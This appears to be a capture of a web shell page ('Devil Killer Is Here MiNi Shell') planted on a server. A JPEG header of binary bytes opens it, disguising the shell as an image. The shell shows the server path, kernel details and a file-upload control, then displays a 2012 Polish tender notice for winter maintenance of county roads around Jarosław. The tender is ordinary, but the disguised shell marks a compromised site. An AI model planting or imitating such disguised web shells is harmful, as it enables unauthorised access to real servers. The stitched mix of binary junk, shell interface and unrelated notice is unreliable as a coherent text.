JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120827/316050-N-2012.html

<p class="kh_header"><b>Jarosław: Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych administrowanych przez Powiatowy Zarząd Dróg w Jarosławiu w sezonie  2012/2013</b><br>
<b>Numer ogłoszenia: 316050 - 2012; data zamieszczenia: 27.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Jarosławiu , ul. Jana Pawła II 17, 37-500 Jarosław, woj. podkarpackie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.jaroslaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie zimowego utrzymania dróg powiatowych administrowanych przez Powiatowy Zarząd Dróg w Jarosławiu w sezonie  2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Przedmiot niniejszego zamówienia obejmuje  :
Zadanie Nr 1-   gmina Laszki i Wiązownica - Dwa nośniki  o ładowności min.  8 ton  wyposażone w   dwa pługi odśnieżne  jednostronne , dwa pługi odśnieżne dwustronne  oraz dwie rozsypywarki  o pojemności zasobnika min 4 m3 lub większą. Całość stanowi własność Wykonawcy .  
Zadanie Nr 2-   gmina Pawłosiów i Jarosław -  Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większa. Całość stanowi własność Wykonawcy .  
Zadanie Nr 3-  gmina  Radymno -  Nośnik   o ładowności min.  8 ton  wyposażony w    pług odśnieżny  jednostronny ,   pług odśnieżny  dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większą. Całość stanowi własność Wykonawcy .  
Zadanie Nr 4-   gmina Rokietnica i Chłopice - Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większa. Całość stanowi własność Wykonawcy .  
Zadanie Nr 5-   gmina Pruchnik i Rożwienica -  Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większą. Całość stanowi własność Wykonawcy .  
Zadanie Nr 6-   miasto Jarosław-  Dwa Nośniki   o ładowności do 8 ton  wyposażone w  dwa  pługi odśnieżne jednostronne sterowane z kabiny operatora z możliwością zmiany kąta ataku    oraz  dwie rozsypywarki sterowane elektronicznie o pojemności zasobnika min 4 m3 lub większą oraz ciągnik   typu średniego wyposażony w pług odśnieżny jednostronny oraz rozsypywarkę do 4 m3 lub większą  Całość stanowi własność Wykonawcy .  
Zadanie nr 7 - miasto Radymno - Nośnik o ładowności do 6 ton  lub ciągnik typu średniego wyposażony w pług odśnieżny jednostronny oraz rozsypywarkę o pojemności zasobnika do 4 m3 .   Całość stanowi własność Wykonawcy 
Zadanie   Nr 8 pług ciężki-   Nośnik    o ładowności powyżej 12 ton wyposażony w   pług odśnieżny dwustronny  typ ciężki  . Całość stanowi własność Wykonawcy 
Zadanie Nr 9 równiarka-   o mocy powyżej 100 KM wyposażona w  pług dwustronny czołowy . Całość stanowi własność Wykonawcy .  
Zadanie Nr 10  ładowarka samojezdna kołowa o poj. łyżki min. 0,90 m3.  Własność Wykonawcy .  
3. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III  niniejszej  SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III  niniejszej  SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną     dla zadań od 1 do 7 w ilościach szczegółowo określonych w Rozdziale  III  niniejszej 
        SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,

  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
        obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów/ nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
      niniejszej  SIWZ .
4. Zaleca się  dokonania przez Wykonawców wizji lokalnej na terenie będącym przedmiotem niniejszego zamówienia dla zadań od 1 do 7  w celu dokonania   oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być niezbędne  w przygotowaniu oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda  wniesienia wadium .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.  Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie  oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, jeżeli Wykonawca wykaże, że wykonał ( świadczył) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie minimum przez 2 sezony 
  usługi z zakresu zimowego utrzymania dróg krajowych, wojewódzkich , powiatowych , miejskich lub gminnych,  polegające  na  odśnieżaniu i  zwalczaniu śliskości  , z załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie.  Powyższe wymagania dotyczą zadań 1,2,3,4,5,6 i7.  
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają wyżej wymienione wymagania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, jeżeli Wykonawca wykaże, że dysponuje w celu realizacji niniejszego zamówienia jednostkami sprzętu i środkami transportu wymienionymi poniżej:
Zadanie Nr 1-   gmina Laszki i Wiązownica	Dwa nośniki  o ładowności min.  8 ton  wyposażone w   dwa pługi odśnieżne  jednostronne , dwa pługi odśnieżne dwustronne  oraz dwie rozsypywarki  o pojemności zasobnika min 4 m3 lub większą.
Zadanie Nr 2-   gmina Pawłosiów i Jarosław	Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większa.
Zadanie Nr 3-  gmina  Radymno	Nośnik   o ładowności min.  8 ton  wyposażony w    pług odśnieżny  jednostronny ,   pług odśnieżny  dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większą
Zadanie Nr 4-   gmina Rokietnica i Chłopice	Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większa.
Zadanie Nr 5-   gmina Pruchnik i Rożwienica	Nośnik   o ładowności min. 8 ton  wyposażony w    pług odśnieżny jednostronny ,   pług odśnieżny dwustronny  oraz   rozsypywarkę  o pojemności zasobnika min 4 m3 lub większą.
Zadanie Nr 6-   miasto Jarosław	Dwa Nośniki   o ładowności do 8 ton  wyposażone w  dwa  pługi odśnieżne jednostronne sterowane z kabiny operatora z możliwością zmiany kąta ataku    oraz  dwie rozsypywarki sterowane elektronicznie o pojemności zasobnika min 4 m3 lub większą oraz ciągnik   typu średniego wyposażony w pług odśnieżny jednostronny oraz rozsypywarkę do 4 m3 lub większą
Zadanie nr 7 - miasto Radymno	Nośnik o ładowności do 6 ton  lub ciągnik typu średniego wyposażony w pług odśnieżny jednostronny oraz rozsypywarkę o pojemności zasobnika do 4 m3
Zadanie   Nr 8 pług ciężki	Nośnik    o ładowności powyżej 12 ton wyposażony w   pług odśnieżny dwustronny  typ ciężki  
Zadanie Nr 9 równiarka	o mocy powyżej 100 KM wyposażona w  pług dwustronny czołowy .
Zadanie Nr 10 ładowarka	Ładowarka samojezdna kołowa o poj. łyżki min. 0,90 m3
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają wyżej wymienione wymagania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.  Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie  oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.  Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie  oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o spełnieniu warunków udziału w postępowaniu.
2. W przypadku, gdy Wykonawca polegać będzie na doświadczeniu lub  potencjale technicznym do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą , którego oferta zostanie wybrana, zawarta zostanie umowa wg wzoru zawartego w Rozdziale III niniejszej SIWZ.
2. Wszelkie zmiany w umowie wymagają zgody obu Stron   w formie pisemnej pod rygorem nieważności.
3. Strony przewidują możliwość dokonywania zmian w Umowie. Zmiana Umowy dopuszczalna będzie w granicach  
    wyznaczonych przepisami Pzp, w tym art. 144 ust. 1 Pzp .
4. Zmiana postanowień umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy lub okoliczności, których nie można było przewidzieć w chwili zawarcia umowy a w szczególności: 

   1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu 
       zamówienia lub świadczenia Stron,
   2) zmianie wynagrodzenia w przypadku, gdy zmianie ulegnie stawka podatku VAT, 
   3) działanie siły wyższej. Za siłę wyższą, warunkującą zmianę Umowy uważać się będzie w szczególności: 
        powódź, pożar i inne klęski  żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe 
        załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub 
        skażenia.
 5. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
6. W przypadku o którym mowa w ust. 5 Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu 
     wykonania części umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.jaroslaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można pobrać ze strony internetowej www.pzd.jaroslaw.pl. , nabyć w siedzibie zamawiającego pok. 311 lub za zaliczeniem pocztowym- cena 12,20 PLN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2012 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Jarosławiu, ul. Jana Pawła II 17, pok. nr 313(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1-   gmina Laszki i Wiązownica - Dwa nośniki  o ładowności min.  8 ton  wyposażone w   dwa pługi odśnieżne  jednostronne , dwa pługi odśnieżne dwustronne  oraz dwie rozsypywarki  o pojemności zasobnika min 4 m3 lub większą. Całość stanowi własność Wykonawcy ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Powyższe usługi polegać będą na:      
1) świadczeniu usług w zakresie zimowego utrzymania dróg  wymienionych ,zgodnie z Planem Zimowego Utrzymania Dróg opracowanym przez Zamawiającego, zawartym w Rozdziale III    SIWZ
              we wszystkie dni tygodnia w niekorzystnych warunkach atmosferycznych ( niskie temperatury zawieje i zamiecie śnieżne ) na wezwanie i według potrzeb  Zamawiającego ,
 2)   zapewnieniu jakości wykonywanych usług odpowiadających obowiązującym standardom zimowego utrzymania dróg ( uzyskanie stanu nawierzchni obowiązującego dla standardu w którym utrzymywana jest droga), ustalonych przez Zamawiającego w Planie zimowego utrzymania dróg zawartego w Rozdziale III    SIWZ
  3)   przekazywanie  za pośrednictwem osób obsługujących pojazdy i sprzęt   przedstawicielom Zamawiającego informacji o aktualnym stanie przejezdności dróg,  czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach dróg oraz  zagrożeniach spowodowanych aktualnymi warunkami atmosferycznymi.
  4)  zabezpieczeniu we własnym zakresie i na własny koszt  materiały do zwalczania śliskości tj. mieszankę 
       piaskowo-solną      w ilościach szczegółowo określonych w Rozdziale  III   
        SIWZ. Załadunek materiałów odbywać się będzie sprzętem Wykonawcy i na jego koszt ,
  5) utrzymaniu w gotowości sprzętu i urządzeń przewidzianych do realizacji przedmiotu zamówienia wraz z ich 
     obsługą, a w przypadku awarii dokonać podmiany uszkodzonego sprzętu na sprawny technicznie .
  6) zapewnieniu przez wykonawcę we własnym zakresie obsługi naprawczo-remontowej sprzętu przewidzianego do 
       świadczenia usług przy zimowym utrzymaniu dróg, 
  7)   udostępnienia   Zamawiającemu zaoferowanych  w ofercie  pojazdów nośników do świadczenia usług przy zimowym utrzymaniu dróg , w celu zamontowania urządzeń monitorujących GPS. Urządzenia stanowią własność Zamawiającego.  Wykonawca ponosi pełną odpowiedzialność za wszelkie uszkodzenia tych urządzeń powstałych z winy niewłaściwego ich użytkowania bądź regulowania bez wiedzy i zgody Właściciela tych urządzeń.  
 4. Szczegółowy opis przedmiotu zamówienia zawiera Plan zimowego utrzymania dróg zawarty w Rozdziale III  
       SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.53.00.00-2.</p></li>
